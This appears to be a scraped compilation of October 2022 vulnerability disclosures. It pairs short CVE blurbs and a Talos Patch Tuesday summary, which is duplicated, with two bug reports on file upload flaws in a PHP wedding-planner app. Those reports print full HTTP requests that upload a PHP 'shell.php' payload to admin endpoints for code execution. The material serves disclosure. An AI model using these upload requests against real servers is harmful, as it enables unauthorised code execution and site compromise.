Windows Group Policy Preference Client Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37993, CVE-2022-37994.

CVE-2022-37999

Windows Active Directory Certificate Services Security Feature Bypass.

CVE-2022-37978

Windows Storage Elevation of Privilege Vulnerability.

CVE-2022-38027

Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24504, CVE-2022-30198, CVE-2022-33634, CVE-2022-38000, CVE-2022-38047, CVE-2022-41081.

CVE-2022-22035

Microsoft Windows Defender Elevation of Privilege Vulnerability.

CVE-2022-37971

Windows CryptoAPI Spoofing Vulnerability.

CVE-2022-34689

Authenticated (admin+) Reflected Cross-Site Scripting (XSS) vulnerability in Gabe Livan's Asset CleanUp: Page Speed Booster plugin <= 1.3.8.4 at WordPress.

CVE-2021-36899: Asset CleanUp: Page Speed Booster

Wedding Planner v1.0 is vulnerable to arbitrary code execution via users_profile.php.

Permalink

**Wedding Planner v1.0 by pushpam02 has arbitrary code execution (RCE)**

BUG\_Author：李趴菜

vendor: https://www.sourcecodester.com/php/15375/wedding-planner-project-php-free-download.html

Vulnerability url: http://ip/Wedding-Management-PHP/admin/blog\_events\_edit.php?id=31

Loophole location：The editing function of "Liam moore" module in the background management system-- > there is an arbitrary file upload vulnerability (RCE) in the picture upload point of "users\_profile.php" file.

Click "Edit My Account" to save

Request package for file upload：

POST /Wedding\-Management\-PHP/admin/users\_profile.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/Wedding-Management-PHP/admin/users\_profile.php
Cookie: PHPSESSID=ncd6h7doujvbbft46r0m7mbr6s
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------11146289715390
Content-Length: 1065
\-----------------------------11146289715390
Content-Disposition: form-data; name="profile\_picture"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------11146289715390
Content-Disposition: form-data; name="firstname"
Liam
\-----------------------------11146289715390
Content-Disposition: form-data; name="lastname"
Moore
\-----------------------------11146289715390
Content-Disposition: form-data; name="email"
admin@mail.com
\-----------------------------11146289715390
Content-Disposition: form-data; name="username"
adminliam
\-----------------------------11146289715390
Content-Disposition: form-data; name="gender"
m
\-----------------------------11146289715390
Content-Disposition: form-data; name="address"
Grand Meadows
\-----------------------------11146289715390
Content-Disposition: form-data; name="designation"
0
\-----------------------------11146289715390
Content-Disposition: form-data; name="submit"
\-----------------------------11146289715390--

The files will be uploaded to this directory \\Wedding-Management-PHP\\admin\\upload\\users 

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-42034: bug_report/RCE-1.md at main · debug601/bug_report

Wedding Planner v1.0 is vulnerable to Arbitrary code execution via package_edit.php.

Permalink

Cannot retrieve contributors at this time

**Wedding Planner v1.0 by pushpam02 has arbitrary code execution (RCE)**

BUG\_Author: Tr0e

vendor: https://www.sourcecodester.com/php/15375/wedding-planner-project-php-free-download.html

Vulnerability url: http://ip/Wedding-Management-PHP/admin/package\_edit.php?id=1

Loophole location：The editing function of "Services" module in the background management system-- > there is an arbitrary file upload vulnerability (RCE) in the picture upload point of "package\_edit.php" file.

Click "Edit" to save

Request package for file upload：

POST /Wedding\-Management\-PHP/admin/package\_edit.php?id\=1 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/Wedding-Management-PHP/admin/package\_edit.php?id=1
Cookie: PHPSESSID=ncd6h7doujvbbft46r0m7mbr6s
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------2779055672062
Content-Length: 529
\-----------------------------2779055672062
Content-Disposition: form-data; name="wedding\_type"
2
\-----------------------------2779055672062
Content-Disposition: form-data; name="price"
0.00
\-----------------------------2779055672062
Content-Disposition: form-data; name="preview\_image"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------2779055672062
Content-Disposition: form-data; name="submit"
\-----------------------------2779055672062--

The files will be uploaded to this directory \\Wedding-Management-PHP\\admin\\upload\\categories

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-42229: bug_report/RCE-1.md at main · Tr0ee/bug_report

By Jon Munshaw and Vanja Svajcer.
Microsoft released its monthly security update Tuesday, disclosing 83 vulnerabilities across the company’s hardware and software line, including seven critical issues in Windows’ point-to-point tunneling protocol. 
October's security update features 11 critical vulnerabilities, with the remainder being “important.”  
One of the most notable vulnerabilities Microsoft fixed this month is CVE-2022-41038, a remote code execution issue in Microsoft SharePoint. There are several other SharePoint vulnerabilities included in this month’s Patch Tuesday, though this seems the most severe, as Microsoft continues it to be “more likely” to be exploited.  
An attacker must be authenticated to the target site with the correct permissions to use manage lists in SharePoint to exploit this vulnerability, and eventually gain the ability to execute remote code on the SharePoint server.  

CVE-2022-37968, an elevation of privilege vulnerability in Azure Arc Connect, has the highest severity score out of all the vulnerabilities Microsoft fixed this month — a maximum 10 out of 10. Successful exploitation of this vulnerability, which affects the cluster connect feature of Azure Arc-enabled Kubernetes clusters, could allow an unauthenticated user to elevate their privileges as cluster admins and potentially gain control over the Kubernetes cluster. 
CVE-2022-37976 and CVE-2022-37979 are also critical elevation of privilege vulnerabilities in Windows Active Directory and Hyper-V, respectively.  
The Windows’ point-to-point tunneling protocol, which is a network protocol used to create VPN tunnels between public networks, contains eight vulnerabilities that Microsoft disclosed Tuesday, seven of which are rated “critical” severity: 


CVE-2022-22035
CVE-2022-24504 
CVE-2022-30198 
CVE-2022-33634 
CVE-2022-38000 
CVE-2022-38047 
CVE-2022-41081 


CVE-2022-38000 is the most serious among the group with a severity rating of 9. An attacker could successfully exploit this issue to launch remote code at the remote server. 
Microsoft Office and Word also contain critical remote code execution vulnerabilities. These are usually popular targets for adversaries, as they are one of the most popular pieces of software in the world and can be exploited just by tricking a user into opening a specially crafted document: 


CVE-2022-38048
CVE-2022-38049 
CVE-2022-41031 


Microsoft has also included 12 vulnerabilities in Google Chromium, the open-source web browser that is the basis for Microsoft’s Edge browser. Google has already disclosed and fixed these issues, so users do not need to take any additional steps to implement patches: 


CVE-2022-3304 
CVE-2022-3307 
CVE-2022-3308 
CVE-2022-3310 
CVE-2022-3311 
CVE-2022-3313 
CVE-2022-3315 
CVE-2022-3316 
CVE-2022-3317 
CVE-2022-3370 
CVE-2022-3373 
CVE-2022-41035 


A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page. 
In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  
The rules included in this release that protect against the exploitation of many of these vulnerabilities are 60693 - 60696, 60698 - 60701, 60706, 60701 - 60705, 60708 and 60709. There are also Snort 3 SIDs 300290 - 300296, 300297 and 300298.

**

  
**

_By Jon Munshaw and Vanja Svajcer._

Microsoft released its monthly security update Tuesday, disclosing 83 vulnerabilities across the company’s hardware and software line, including seven critical issues in Windows’ point-to-point tunneling protocol. 

October's security update features 11 critical vulnerabilities, with the remainder being “important.”  

One of the most notable vulnerabilities Microsoft fixed this month is CVE-2022-41038, a remote code execution issue in Microsoft SharePoint. There are several other SharePoint vulnerabilities included in this month’s Patch Tuesday, though this seems the most severe, as Microsoft continues it to be “more likely” to be exploited. 

An attacker must be authenticated to the target site with the correct permissions to use manage lists in SharePoint to exploit this vulnerability, and eventually gain the ability to execute remote code on the SharePoint server.  

CVE-2022-37968, an elevation of privilege vulnerability in Azure Arc Connect, has the highest severity score out of all the vulnerabilities Microsoft fixed this month — a maximum 10 out of 10. Successful exploitation of this vulnerability, which affects the cluster connect feature of Azure Arc-enabled Kubernetes clusters, could allow an unauthenticated user to elevate their privileges as cluster admins and potentially gain control over the Kubernetes cluster. 

CVE-2022-37976 and CVE-2022-37979 are also critical elevation of privilege vulnerabilities in Windows Active Directory and Hyper-V, respectively.  

The Windows’ point-to-point tunneling protocol, which is a network protocol used to create VPN tunnels between public networks, contains eight vulnerabilities that Microsoft disclosed Tuesday, seven of which are rated “critical” severity: 

*   CVE-2022-22035
*   CVE-2022-24504 
*   CVE-2022-30198 
*   CVE-2022-33634 
*   CVE-2022-38000 
*   CVE-2022-38047 
*   CVE-2022-41081 

CVE-2022-38000 is the most serious among the group with a severity rating of 9. An attacker could successfully exploit this issue to launch remote code at the remote server. 

Microsoft Office and Word also contain critical remote code execution vulnerabilities. These are usually popular targets for adversaries, as they are one of the most popular pieces of software in the world and can be exploited just by tricking a user into opening a specially crafted document: 

*   CVE-2022-38048
*   CVE-2022-38049 
*   CVE-2022-41031 

Microsoft has also included 12 vulnerabilities in Google Chromium, the open-source web browser that is the basis for Microsoft’s Edge browser. Google has already disclosed and fixed these issues, so users do not need to take any additional steps to implement patches: 

*   CVE-2022-3304 
*   CVE-2022-3307 
*   CVE-2022-3308 
*   CVE-2022-3310 
*   CVE-2022-3311 
*   CVE-2022-3313 
*   CVE-2022-3315 
*   CVE-2022-3316 
*   CVE-2022-3317 
*   CVE-2022-3370 
*   CVE-2022-3373 
*   CVE-2022-41035 

A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page. 

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 60693 - 60696, 60698 - 60701, 60706, 60701 - 60705, 60708 and 60709. There are also Snort 3 SIDs 300290 - 300296, 300297 and 300298.

Tag

#windows